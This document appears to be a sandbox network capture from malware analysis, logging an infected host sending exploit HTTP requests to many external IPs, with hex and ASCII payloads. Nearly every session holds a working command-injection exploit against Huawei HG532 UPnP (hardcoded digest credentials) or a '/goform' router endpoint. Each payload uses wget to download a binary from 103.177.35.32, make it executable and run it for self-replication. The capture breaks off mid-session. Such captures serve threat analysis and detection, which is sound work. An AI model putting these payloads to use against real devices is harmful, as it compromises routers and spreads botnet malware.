                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        317192.168.2.233520641.155.28.12237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.323034048 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        318192.168.2.2335708157.39.196.22137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.323122025 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        319192.168.2.235892441.148.97.7637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.323164940 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        320192.168.2.233361441.115.113.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.323175907 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        321192.168.2.2360982166.190.168.22237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.324125051 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        322192.168.2.235861241.47.219.9337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.324218035 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        323192.168.2.2360692157.180.31.23037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.324229956 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        324192.168.2.23425401.3.95.1528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290052891 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        325192.168.2.2342062105.90.125.1708080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290086031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        326192.168.2.2352308189.37.120.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290117979 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        327192.168.2.233350481.218.52.1578080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290138006 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        328192.168.2.2347296114.155.124.2148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290159941 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        329192.168.2.233765070.54.81.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:06.290210009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
